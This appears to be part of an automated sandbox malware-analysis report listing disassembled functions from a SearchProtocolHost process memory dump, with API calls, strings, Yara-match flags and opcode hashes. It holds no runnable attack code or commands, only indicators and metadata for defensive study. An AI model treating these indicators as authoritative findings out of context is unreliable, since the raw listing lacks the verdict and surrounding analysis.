                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 27afee1b1df2c7f65cdc98da5fd997d93b40e36ee6d4a06e047b54856c264320
                                                                                      • Instruction ID: 0bcd176f020f06b1ed74e85fdabce83596bfc5c025acfc8dbff92d3720d4f5bb
                                                                                      • Opcode Fuzzy Hash: 27afee1b1df2c7f65cdc98da5fd997d93b40e36ee6d4a06e047b54856c264320
                                                                                      • Instruction Fuzzy Hash: E790022125204562A945F2584504507400697E4641791C526A5404950CC6369856F622
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DA06C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(53s9401,00000111,00000000,00000000), ref: 02DA0737
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: 53s9401$53s9401
                                                                                      • API String ID: 1836367815-601017041
                                                                                      • Opcode ID: 67318d97ab6e384455ff974cac5a9be2c01911e63481392633f83c4461e226ba
                                                                                      • Instruction ID: 69293e185ed02e7096513d3c2adae9623cf8a3c056609bbd267d637bdab93487
                                                                                      • Opcode Fuzzy Hash: 67318d97ab6e384455ff974cac5a9be2c01911e63481392633f83c4461e226ba
                                                                                      • Instruction Fuzzy Hash: DF01C472D0110CBAEB11AAE48C91DEFBB7DDF44794F048064FA0477240D6359E068BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB2210 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02DB22DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: f864155e938c288c630d89186789d09197ca3a6f61a98967dd0d1cc0dda5c341
                                                                                      • Instruction ID: 3c579a148774a0781235e70207154d2792567399107d9de2337c0df06210e73a
                                                                                      • Opcode Fuzzy Hash: f864155e938c288c630d89186789d09197ca3a6f61a98967dd0d1cc0dda5c341
                                                                                      • Instruction Fuzzy Hash: 5C31A1B1600304ABD714DFA4D890FA7B7B9FF48704F04856DEA9E9B344D770A944CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB2205 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 96sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02DB22DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: e01b65cb1afe7356bc8fba835ceb0a9f2bea0fcc0d631a4845f563c274ad98ef
                                                                                      • Instruction ID: 077bb6b68486aba345fe5be2b041a6a3d5316a74ef95eacaa000aa57d297fa73
                                                                                      • Opcode Fuzzy Hash: e01b65cb1afe7356bc8fba835ceb0a9f2bea0fcc0d631a4845f563c274ad98ef
                                                                                      • Instruction Fuzzy Hash: 3531B3B1640305ABD714DFA4D890FA6B7B9FF44704F04816DEA9E5B385D7706904CBE4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DA8911 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 02DA8A16
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID: @
                                                                                      • API String ID: 3188754299-2766056989
                                                                                      • Opcode ID: 3e7d1b04733835618ec0924f36c8004f485eba1a8c4eca5940c49f83b2460587
                                                                                      • Instruction ID: 3c195ee5b5aca1c645137e247efa39db9a23be13d6036b653837f90e004fea96
                                                                                      • Opcode Fuzzy Hash: 3e7d1b04733835618ec0924f36c8004f485eba1a8c4eca5940c49f83b2460587
                                                                                      • Instruction Fuzzy Hash: 427134B2910208ABDB25DB64CCD5FEFB3BDFF58304F044599A51A97240EB70AB458FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DAE2AC Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 02DAE2C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 2538663250-2016760708
                                                                                      • Opcode ID: 2e1fad2a321328ae58c9c87d249e6c7ffe0f0fb363bccd87319ad71c5006b7e5
                                                                                      • Instruction ID: 046a1b39057d590f34c8777a6487703bb6d07ce7a4ab87ad7035f66dc7e7b0d1
                                                                                      • Opcode Fuzzy Hash: 2e1fad2a321328ae58c9c87d249e6c7ffe0f0fb363bccd87319ad71c5006b7e5
                                                                                      • Instruction Fuzzy Hash: 4A310EB6A0060AAFDB00DFD8D890DEEB7B9BF88304B108559E505AB314D775EE45CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DAE2B0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 02DAE2C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 2538663250-2016760708
                                                                                      • Opcode ID: fdb738ec5bab71cf8d0ac031cb5c586ead77b81650c15eab81acff971659feb8
                                                                                      • Instruction ID: 9efc8114e616b2e9c9d9cc9440530da25cd216f8e33ca74691b0a59c75bfc376
                                                                                      • Opcode Fuzzy Hash: fdb738ec5bab71cf8d0ac031cb5c586ead77b81650c15eab81acff971659feb8
                                                                                      • Instruction Fuzzy Hash: E5311EB5A0060AAFDB00DFD8D890DEEB7B9FF88304B108559E506AB314D775EE45CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DA3EC0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DA3F32
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: fd6090d43753344c0b09379c6f97590599d9c140d3d7e1cf68c4173bb859a20f
                                                                                      • Instruction ID: f575eb2ec29cabc634f4abe17822966190c059badae12c09f4e97c50466e191b
                                                                                      • Opcode Fuzzy Hash: fd6090d43753344c0b09379c6f97590599d9c140d3d7e1cf68c4173bb859a20f
                                                                                      • Instruction Fuzzy Hash: 7E011EB6D0020DBBDB14DBA4DC51FDEB7B99F44308F0041A5E90997280F631EB18CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB52F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessInternalW.KERNELBASE(02DA0B71,02DA0B99,02DA0971,00000000,02DA7353,00000010,02DA0B99,?,?,00000044,02DA0B99,00000010,02DA7353,00000000,02DA0971,02DA0B99), ref: 02DB5350
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInternalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2186235152-0
                                                                                      • Opcode ID: 3a4ec6e7ce42bb4b2145899a93253166fd7430aca291ca119615390df9c56788
                                                                                      • Instruction ID: 5030a5e0340c7336b643fcb446ca98b49574dbc1a8bad035beb121a1c68cffe6
                                                                                      • Opcode Fuzzy Hash: 3a4ec6e7ce42bb4b2145899a93253166fd7430aca291ca119615390df9c56788
                                                                                      • Instruction Fuzzy Hash: 1401C4B2200108BFCB04DE89DC91EEB77ADEF8D714F408108BA0DA3241D630FC518BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02D99930 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D99975
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      • Opcode ID: 07943d94e61e1aa306d687394d3e58f9eabf83bf1cc28336e77a6fec52b1047c
                                                                                      • Instruction ID: c6f578d6f3614a1f2fa8295364d735d0f634620551ecd4d07228aad0fe4887bf
                                                                                      • Opcode Fuzzy Hash: 07943d94e61e1aa306d687394d3e58f9eabf83bf1cc28336e77a6fec52b1047c
                                                                                      • Instruction Fuzzy Hash: D6F065733402047AE73066AA9C02FDBB39DDF85B61F150429F74DDA2C0D9A1F84146F4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB5260 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,848DF445,00000007,00000000,00000004,00000000,02DA36AC,000000F0,?,?,?,?,00000000), ref: 02DB529C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 50deed231f1be492a842a1633da80fca67aa126142c48f54a6d4959a08e0bb21
                                                                                      • Instruction ID: f56e905a3b27e3c4954add2a55886e4e5541adeeb9106be1282e1926cde80984
                                                                                      • Opcode Fuzzy Hash: 50deed231f1be492a842a1633da80fca67aa126142c48f54a6d4959a08e0bb21
                                                                                      • Instruction Fuzzy Hash: 9FE06572200204BBDA10EE99DC44FEB77ADEFCAB10F404009F909AB241DA30BD108BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DB5210 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(02DA1D06,?,02DB3969,02DA1D06,02DB3317,02DB3969,?,02DA1D06,02DB3317,00001000,?,?,02DB6A63), ref: 02DB524C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 37a6de043e202667fa1e2e29d085f17b47aabf27df50f7b72b6580e7291ae504
                                                                                      • Instruction ID: fec601fcb04e5b69f5b5c5c11e165c710bad246462ae2fa3d5d5595a1a180334
                                                                                      • Opcode Fuzzy Hash: 37a6de043e202667fa1e2e29d085f17b47aabf27df50f7b72b6580e7291ae504
                                                                                      • Instruction Fuzzy Hash: A2E065B2200204BBDB10EE59EC45FEB73AEEF89B10F008409F909A7241CA30BD108BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DA7390 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 02DA73BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 77cb1a76331d42d0383fcfa7b0c8655081736428b1bb318653fd1f1e5fe9c6b4
                                                                                      • Instruction ID: a5dfd024ecab73c91673125022124e318ee36bd14634210f1c8d6b505e7090a0
                                                                                      • Opcode Fuzzy Hash: 77cb1a76331d42d0383fcfa7b0c8655081736428b1bb318653fd1f1e5fe9c6b4
                                                                                      • Instruction Fuzzy Hash: 42E080711C020417FB346578DC55F6E33589F48728F195560BD6CDB3C1D674FD418150
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 02DA71A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02DA17CA,02DA1F49,02DB3317,00000000), ref: 02DA71D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 3224cbca99b0c1f04ffd3871c3f6221f63dd543392996e9d5c9d95626dcd4610
                                                                                      • Instruction ID: 5b479e971efdebac83f099ceaff69492008115fb5511e26f31d750ede6fc49a6
                                                                                      • Opcode Fuzzy Hash: 3224cbca99b0c1f04ffd3871c3f6221f63dd543392996e9d5c9d95626dcd4610
                                                                                      • Instruction Fuzzy Hash: 6ED05E726802057BFB10B7E5DC02F5A368DAB447A8F194064BA0CD73C3E964E9014AB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 037D2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7723967934ce08f8e8ea666058e61517b98087981a28d6475dd6de32ef569c46
                                                                                      • Instruction ID: 7737df77b02c1d1cbd0cc8241dcc107fb58b5b580fee09321e52fc49c3ea4c63
                                                                                      • Opcode Fuzzy Hash: 7723967934ce08f8e8ea666058e61517b98087981a28d6475dd6de32ef569c46
                                                                                      • Instruction Fuzzy Hash: 1DB09B719054C5D5EA11D76047087177D1467D0701F15C565D1460681F8778C091F576
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 037C8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • corrupted critical section, xrefs: 038052CD
                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038052D9
                                                                                      • double initialized or corrupted critical section, xrefs: 03805313
                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038052ED
                                                                                      • 8, xrefs: 038050EE
                                                                                      • undeleted critical section in freed memory, xrefs: 03805236
                                                                                      • Thread identifier, xrefs: 03805345
                                                                                      • Critical section address., xrefs: 0380530D
                                                                                      • Invalid debug info address of this critical section, xrefs: 038052C1
                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03805215, 038052A1, 03805324
                                                                                      • Critical section address, xrefs: 03805230, 038052C7, 0380533F
                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 0380534E
                                                                                      • Address of the debug info found in the active list., xrefs: 038052B9, 03805305
                                                                                      • Critical section debug info address, xrefs: 0380522A, 03805339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                      • API String ID: 0-2368682639
                                                                                      • Opcode ID: 2bdd65aab15091d071eead4fc5b02687004a82a94bef0154141917b1085959ad
                                                                                      • Instruction ID: 1fb9d355c4253d5ad9bba272723495d7c95e46469813ce9fb201958cb343013b
                                                                                      • Opcode Fuzzy Hash: 2bdd65aab15091d071eead4fc5b02687004a82a94bef0154141917b1085959ad
                                                                                      • Instruction Fuzzy Hash: 53818EB1A41348BFDF60CFA4CC49BAEBBB4FB49714F144199E514BB281D3B5A940CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 038386C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                      • API String ID: 0-2515994595
                                                                                      • Opcode ID: 7579f2afbefe87e90a539919c5a3fe45f0d0e5da090e4f2b50064b1958913dc6
                                                                                      • Instruction ID: f2fd90b67a856efa8d4a58c010551662d9befcd8f53fe1d4dc4bb3fb1ebdc3a7
                                                                                      • Opcode Fuzzy Hash: 7579f2afbefe87e90a539919c5a3fe45f0d0e5da090e4f2b50064b1958913dc6
                                                                                      • Instruction Fuzzy Hash: 0451C0B15043549BD329DF588884BABB7ECEBC5754F084A6EB9A9C7240E770D608CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: f8c24528de7ac4e361cce9a91fd8ca0f76e15b29e57b15d0f38fa68a8e2aa880
                                                                                      • Instruction ID: 09798c419f820856c083d70f77dc7aa5bd36fffb168e0c876bab55f1353281e3
                                                                                      • Opcode Fuzzy Hash: f8c24528de7ac4e361cce9a91fd8ca0f76e15b29e57b15d0f38fa68a8e2aa880
                                                                                      • Instruction Fuzzy Hash: 81B1BF725493559FC721EF28C484B6FBBE8AF88754F09496EF889D7280D770D908CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0378D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0378D0E6
                                                                                      • @, xrefs: 0378D24F
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0378D136
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0378D202
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0378D06F
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0378D263
                                                                                      • @, xrefs: 0378D09D
                                                                                      • @, xrefs: 0378D2B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      • Opcode ID: be19ab0d6553ba9c8e9c1f0ba1f2967c7ae45eba202bb392f9cf36318d142d5b
                                                                                      • Instruction ID: f541cbb95567d1aa136bef344e39a125e3e5f6f6998d680d95b027b9db55b27a
                                                                                      • Opcode Fuzzy Hash: be19ab0d6553ba9c8e9c1f0ba1f2967c7ae45eba202bb392f9cf36318d142d5b
                                                                                      • Instruction Fuzzy Hash: 26A15BB19483459FD721EF25C484B9BF7E8BF88725F01492EF9989A280D774D908CB93
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0383F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                      • API String ID: 0-2224505338
                                                                                      • Opcode ID: ac050bd4e91f317b0866429744f4261bb0df0cd1fde2d42a4b6522b507a11ab7
                                                                                      • Instruction ID: a7753c8b778de5c3767d7ba633b9adba9011f52d8e2b53699d9efcba86724107
                                                                                      • Opcode Fuzzy Hash: ac050bd4e91f317b0866429744f4261bb0df0cd1fde2d42a4b6522b507a11ab7
                                                                                      • Instruction Fuzzy Hash: C9510576A81388EFC711EF98C858E1AB3A4EF06A64F1844D5F906DB322D675D940DAD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 03818633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • VerifierDebug, xrefs: 03818925
                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 038186E7
                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 0381880F
                                                                                      • HandleTraces, xrefs: 0381890F
                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 038186BD
                                                                                      • VerifierDlls, xrefs: 0381893D
                                                                                      • VerifierFlags, xrefs: 038188D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
